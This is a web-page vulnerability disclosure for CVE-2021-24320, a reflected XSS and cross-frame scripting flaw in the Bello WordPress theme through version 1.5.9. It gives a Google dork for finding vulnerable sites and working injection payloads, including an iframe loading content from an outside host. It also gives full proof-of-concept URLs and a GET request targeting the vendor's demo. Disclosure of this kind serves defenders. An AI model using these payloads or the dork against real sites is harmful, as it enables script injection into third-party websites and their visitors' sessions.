Bello WordPress Theme <= 1.5.9 - Unauthenticated Reflected XSS & XFS

2021.05.17

m0ze (RU)

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2021-24320

CWE: CWE-79

Dork: inurl:/wp-content/themes/bello/

/*!
- # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Unauthenticated Reflected XSS & XFS
- # GOOGLE DORK: inurl:/wp-content/themes/bello/
- # DATE: 2021-03-21
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoldThemes [ https://bold-themes.com ]
- # SOFTWARE VERSION: <= 1.5.9
- # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903
- # CVSS: AV:N/AC:L/PR:N/UI:R/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24320
*/

### -- [ Info: ]

[i] An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Bello theme through 1.5.9 for WordPress.

[i] Vulnerable parameter(s): &listing_list_view=, &bt_bb_listing_field_my_lat=, &bt_bb_listing_field_my_lng=, &bt_bb_listing_field_distance_value=, &bt_bb_listing_field_my_lat_default=, &bt_bb_listing_field_keyword=, &bt_bb_listing_field_location_autocomplete=, &bt_bb_listing_field_price_range_from= and &bt_bb_listing_field_price_range_to=.

[i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ].

### -- [ Impact: ]

[~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`m0ze`);>

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>

### -- [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ]

[!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E

[!] GET /main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E HTTP/1.1
Host: bello.bold-themes.com

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt

https://twitter.com/vladm0ze

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Bello WordPress Theme <= 1.5.9 - Unauthenticated Reflected XSS & XFS

Dork: inurl:/wp-content/themes/bello/

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.